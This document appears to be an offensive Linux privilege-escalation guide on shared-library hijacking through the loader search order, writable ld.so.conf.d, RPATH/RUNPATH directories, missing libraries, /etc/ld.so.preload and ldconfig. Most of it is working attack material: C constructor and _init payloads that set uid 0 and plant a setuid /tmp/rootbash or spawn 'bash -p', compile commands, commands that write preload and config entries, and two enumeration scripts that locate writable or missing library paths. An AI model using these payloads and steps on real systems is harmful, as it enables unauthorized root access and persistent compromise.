Overview

Linux binaries load shared libraries (.so) at runtime: the dynamic loader (ld.so) resolves each NEEDED entry by searching a fixed list of locations and maps the first match it finds. If you can write to a location that is searched before the legitimate copy, or supply a library that is currently missing, the code you place there runs with the privileges of the process that loads it (root for a setuid binary or a root service).

Library Search Order

1. RPATH (DT_RPATH, embedded in the binary; deprecated, and ignored entirely when the binary also carries a RUNPATH)
2. LD_LIBRARY_PATH (environment variable; ignored in secure-execution mode, i.e. for setuid/setgid and capability-bearing binaries, so it is useless against SUID targets)
3. RUNPATH (DT_RUNPATH, embedded in the binary; applies only to that object's own direct dependencies, not to the libraries those dependencies load)
4. /etc/ld.so.cache (generated by ldconfig from /etc/ld.so.conf and /etc/ld.so.conf.d/)
5. /lib and /usr/lib (default; /lib64 and /usr/lib64 on distributions that use them)
Objects listed in /etc/ld.so.preload are mapped before any of this (see ld.so.preload below), and a NEEDED name that contains a slash is opened as a path with no search at all.

Writable /etc/ld.so.conf.d/

ls -la /etc/ld.so.conf.d/
If the directory is writable, add a custom library path:
echo "/tmp/evil" > /etc/ld.so.conf.d/evil.conf
ldconfig
Then create a library in /tmp/evil/ whose file name matches a library loaded by a root process. The loader consults /etc/ld.so.cache, not the .conf files, so the new path does nothing until ldconfig has rebuilt the cache as root (a package install usually triggers it; see ldconfig Abuse below for doing it yourself). Directories from ld.so.conf.d are indexed before the default /lib and /usr/lib, so a library of the same name in /tmp/evil shadows the system copy for anything resolved through the cache, but not a library the binary locates through its own RPATH/RUNPATH. Confirm with ldconfig -p that the entry for that name now points at your directory.

Writable Library Directories

Check whether any configured library path is writable:
cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null
ldconfig -p | awk -F'=> ' '/=>/ {print $2}' | xargs -I{} dirname {} | sort -u | while read -r d; do [ -w "$d" ] && echo "WRITABLE: $d"; done
The /=>/ filter drops the "N libs found in cache" header line, which has no path and would otherwise make dirname print "." and report your current directory as a hit. If a directory is writable, replace an existing library that a privileged process loads from it, or add one under a name that is currently reported as "not found" (see Missing Shared Library below). A replacement must still provide the symbols the program imports from it: with full RELRO (BIND_NOW) every symbol is resolved before constructors run, so a stub library fails with a symbol lookup error before your code executes; with lazy binding only data symbols are resolved up front and a missing function symbol fails at its first call.
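The two checks above are easy to get subtly wrong (the header line, missing directories, the preload file). As an added example, not code from the original page, the following POSIX shell script enumerates every directory the loader can be steered to through /etc/ld.so.conf* and /etc/ld.so.cache and reports which ones you can write to, or create when the configured directory does not exist but its parent is writable. It assumes glibc's ldconfig and the output format of ldconfig -p; the function names are mine, and the parsers read tool output from stdin so they can be exercised on captured text.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate the directories the
# loader searches via /etc/ld.so.conf* and /etc/ld.so.cache and flag the ones
# the current user can write to or create.

# Directories from an ld.so.conf-style file read on stdin. Comments, blank
# lines and "include" directives are dropped; conf_dirs expands the single
# level of includes that a stock /etc/ld.so.conf uses.
parse_ldso_conf() {
    sed -e 's/#.*//' -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' |
        grep -v '^$' | grep -v '^include[[:space:]]' || true
}

conf_dirs() {
    cat /etc/ld.so.conf /etc/ld.so.conf.d/*.conf 2>/dev/null | parse_ldso_conf
}

# Unique directories holding cached libraries, from "ldconfig -p" output on
# stdin. The "N libs found in cache" header has no "=>" and is skipped, so
# dirname is never handed an empty string (which would yield ".").
cache_dirs() {
    awk -F'=> ' '/=>/ { print $2 }' | sed 's:/[^/]*$::' | sort -u
}

# Read directory names on stdin; print WRITABLE for existing directories you
# can write to and CREATABLE for missing ones whose parent you can write to.
# A CREATABLE entry matters for the missing-library case: the loader will
# search it as soon as it exists.
classify_dirs() {
    while IFS= read -r d; do
        [ -n "$d" ] || continue
        if [ -d "$d" ]; then
            [ -w "$d" ] && printf 'WRITABLE: %s\n' "$d"
        elif [ -w "$(dirname "$d")" ]; then
            printf 'CREATABLE: %s\n' "$d"
        fi
    done
    return 0
}

audit_ldso_paths() {
    [ -w /etc/ld.so.conf.d ] && echo "WRITABLE: /etc/ld.so.conf.d (add a .conf; ldconfig must then run as root)"
    [ -w /etc/ld.so.preload ] && echo "WRITABLE: /etc/ld.so.preload"
    echo "# configured search directories:"
    conf_dirs | classify_dirs
    echo "# directories of libraries currently in the cache:"
    ldconfig -p 2>/dev/null | cache_dirs | classify_dirs
    return 0
}

audit_ldso_paths
```

Run it as the low-privileged user you are escalating from; anything it prints as WRITABLE or CREATABLE is a candidate for the techniques on this page, subject to the symbol caveat above.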

RPATH / RUNPATH Injection

Check Binary for RPATH/RUNPATH

readelf -d /usr/local/bin/target | grep -i "rpath\|runpath"
objdump -p /usr/local/bin/target | grep -i "rpath\|runpath"

Example Output

RUNPATH: /home/user/lib:/usr/lib
Directories are tried in the listed order, so a writable directory that appears before the real one lets you shadow any library the binary would otherwise take from the later directory or from the cache. When both RPATH and RUNPATH are present only RUNPATH is used, and an empty component (a leading, trailing or doubled colon) means the current directory. Unlike LD_LIBRARY_PATH, RPATH/RUNPATH entries are still searched for setuid binaries. If /home/user/lib is writable:

Find Libraries the Binary Loads

ldd /usr/local/bin/target
ldd works by invoking the program's dynamic loader, so treat it as executing the binary; for a file you do not trust, list the NEEDED entries statically with readelf -d instead. The library to impersonate is one that resolves from a directory later in the search order than your writable one.

Create Malicious Library

#define _GNU_SOURCE          /* declares setresuid() in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Constructor: the loader runs it when it maps this library, i.e. before
   the target's main() and before any of the target's own code. */
__attribute__((constructor))
static void hijack(void) {
    unsetenv("LD_LIBRARY_PATH");    /* do not re-inject into the commands spawned below */
    setresuid(0, 0, 0);             /* succeeds only if the process already has euid 0 */
    system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
}
Compile, naming the file exactly as the NEEDED entry the binary asks for (check readelf -d for the SONAME, e.g. libtarget.so.1 rather than libtarget.so):
gcc -shared -fPIC -o /home/user/lib/libtarget.so hijack.c
Run the SUID binary, or wait for the root service to execute it. The constructor only runs once the loader has finished relocation, so with full RELRO (-z now) every symbol the target imports from this library must be exported by your replacement; with lazy binding a missing function symbol only fails at its first call, which is after the constructor.

Missing Shared Library

If a SUID binary or root service tries to load a library that doesn’t exist:

Find Missing Libraries

strace /usr/local/bin/suid-binary 2>&1 | grep "No such file"
ldd /usr/local/bin/suid-binary | grep "not found"
strace shows every path the loader tried, including directories that do not exist yet. Keep in mind that ptrace strips the setuid bit, so the traced run executes with your own privileges, and that LD_LIBRARY_PATH is not part of the search for a setuid binary even if strace shows it being used in your unprivileged run. ldd reports a dependency that resolves nowhere as "not found".

Example

libcustom.so => not found
Find a writable directory in the binary's search path (its RPATH/RUNPATH, an ldconfig path, or /lib and /usr/lib; LD_LIBRARY_PATH is ignored for setuid binaries) and create the library there under exactly the NEEDED name:
#include <stdlib.h>
#include <unistd.h>

/* With -nostartfiles the object has no crti.o, so this _init becomes its
   DT_INIT routine and runs as soon as the loader maps the library. */
void _init(void) {
    setuid(0);      /* needs euid 0: a setuid-root target or a root service */
    setgid(0);
    system("/bin/bash -p");
}
gcc -shared -fPIC -nostartfiles -o /writable/path/libcustom.so exploit.c
A function marked __attribute__((constructor)), compiled without -nostartfiles, does the same job and is the cleaner choice. If the program imports symbols from the missing library the same resolution caveat as above applies; a library that was merely dlopen()ed or linked without being used has nothing for the loader to fail on before _init runs.
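The RPATH/RUNPATH and missing-library sections above both come down to the same per-binary questions: which directories does this binary add to the search, which of them can I write to, and which NEEDED entries fail to resolve? As an added example, not code from the original page, the following POSIX shell script answers them without executing the target. It assumes binutils readelf -d and glibc ldd / ldconfig -p output formats, treats an empty RPATH component as "." (glibc's behaviour), expands only the $ORIGIN token, and uses function names of my own.

```shell
#!/bin/sh
# Added example (not from the original page): per-binary RPATH/RUNPATH and
# missing-library checks. Parsers read tool output on stdin; resolve_needed
# and analyze_binary run the real tools on a path given as an argument.

# NEEDED entries from "readelf -d" output: the names the loader searches for.
needed_libs() {
    sed -n 's/.*(NEEDED).*\[\(.*\)\].*/\1/p'
}

# The search directories the binary itself contributes, one per line with the
# tag they came from. The loader ignores DT_RPATH when DT_RUNPATH is present,
# so RUNPATH wins if both are set; an empty component (leading, trailing or
# doubled colon) is the current directory.
effective_rpath() {
    awk '
        /\(RUNPATH\)/                   { tag = "RUNPATH"; path = $0 }
        /\(RPATH\)/ && tag != "RUNPATH" { tag = "RPATH";   path = $0 }
        END {
            if (tag == "") exit
            sub(/.*\[/, "", path); sub(/\].*/, "", path)
            n = split(path, dirs, ":")
            for (i = 1; i <= n; i++) print tag, (dirs[i] == "" ? "." : dirs[i])
        }'
}

# Libraries that ldd reports as "not found". ldd runs the program's own
# dynamic loader, so only feed it binaries you would execute anyway.
ldd_missing() {
    awk '/=> not found/ { print $1 }'
}

# Resolve each NEEDED name without executing the target, in the order the
# loader uses for a setuid program (LD_LIBRARY_PATH is ignored there):
# RPATH/RUNPATH directories, the ldconfig cache, then the default directories.
resolve_needed() {
    bin=$1
    dyn=$(readelf -d "$bin" 2>/dev/null)
    rpath=$(printf '%s\n' "$dyn" | effective_rpath | awk '{ print $2 }' |
            sed "s|[\$]ORIGIN|$(dirname "$bin")|g")
    cache=$(ldconfig -p 2>/dev/null)
    printf '%s\n' "$dyn" | needed_libs | while IFS= read -r lib; do
        found=
        for d in $rpath; do
            [ -f "$d/$lib" ] && { found=$d/$lib; break; }
        done
        if [ -z "$found" ]; then
            # first cache entry with that name; multi-arch systems may list more
            found=$(printf '%s\n' "$cache" | awk -v l="$lib" '$1 == l { print $NF; exit }')
        fi
        if [ -z "$found" ]; then
            for d in /lib /usr/lib /lib64 /usr/lib64; do
                [ -f "$d/$lib" ] && { found=$d/$lib; break; }
            done
        fi
        printf '%s => %s\n' "$lib" "${found:-NOT FOUND}"
    done
}

# Report the binary's own search directories with their writability, then the
# resolution of every NEEDED entry; "NOT FOUND" lines are the targets.
analyze_binary() {
    bin=$1
    echo "== $bin"
    readelf -d "$bin" 2>/dev/null | effective_rpath | while read -r tag d; do
        if [ ! -e "$d" ]; then state="does not exist"
        elif [ -w "$d" ]; then state="WRITABLE"
        else state="not writable"; fi
        echo "$tag $d ($state)"
    done
    resolve_needed "$bin"
}

for bin in "$@"; do analyze_binary "$bin"; done
```

Run it as sh analyze.sh /usr/local/bin/target. A RUNPATH directory reported WRITABLE that precedes the directory a library resolves from, or a NEEDED entry reported NOT FOUND, is the situation the two sections above exploit.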

ld.so.preload

The loader reads /etc/ld.so.preload when starting every dynamically linked program and maps the objects listed there before the program's own dependencies, so their constructors run first and their symbols take precedence over the libraries loaded later. Unlike LD_PRELOAD it is system-wide and is not subject to the secure-execution restrictions, so it reaches setuid binaries as well.

Check Permissions

ls -la /etc/ld.so.preload
The file normally does not exist, so this also applies if you can create it, which requires write access to /etc. If writable:
echo "/tmp/evil.so" > /etc/ld.so.preload
Use an absolute path, and note that > discards any entries already there (append with >> if you need to keep them). Create evil.so:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* DT_INIT routine (built with -nostartfiles): this runs in every
   dynamically linked process on the system, so act only as root and only
   once. system() spawns /bin/sh, which is itself a root process that
   preloads this object; the environment marker stops that child from
   re-running the payload, which would otherwise fork itself endlessly. */
void _init(void) {
    if (getuid() == 0 && getenv("LD_HIJACK_DONE") == NULL
            && access("/tmp/rootbash", F_OK) != 0) {
        setenv("LD_HIJACK_DONE", "1", 1);
        unsetenv("LD_PRELOAD");     /* only relevant if also injected via LD_PRELOAD */
        system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
    }
}
gcc -shared -fPIC -nostartfiles -o /tmp/evil.so evil.c
The next time any dynamically linked program starts as root, the payload runs. Every process on the machine maps this object, so mistakes are visible everywhere: if the file cannot be opened or is not a valid shared object the loader prints an error at every program start (it then continues without it), and a payload that crashes takes every process down with it. Remove the entry and the library as soon as you have your root shell.

ldconfig Abuse

If you can run ldconfig as root (directly, or through a sudo rule that allows it), you can rebuild /etc/ld.so.cache on demand instead of waiting for the system to do it:
sudo ldconfig
After adding a path to /etc/ld.so.conf.d/ or dropping a library into an existing configured path, ldconfig rebuilds the cache:
# Verify cache updated
ldconfig -p | grep evil
Two details matter for the dropped file: ldconfig only indexes ELF files whose names look like libraries (lib*.so*), and it keys each entry by the SONAME embedded in the file when there is one, so build the library with the name the target asks for (and set -Wl,-soname to match). A sudo rule that permits arguments is worse still, since ldconfig -f lets you point it at a configuration file of your own.

Quick Reference

Scenario                         Technique
Writable /etc/ld.so.conf.d/      Add custom lib path, then ldconfig (as root)
Writable RPATH/RUNPATH dir       Drop malicious .so under the NEEDED name
Missing library (not found)      Create .so in a writable search-path dir
Writable /etc/ld.so.preload      Preload malicious .so globally
Writable library directory       Replace existing .so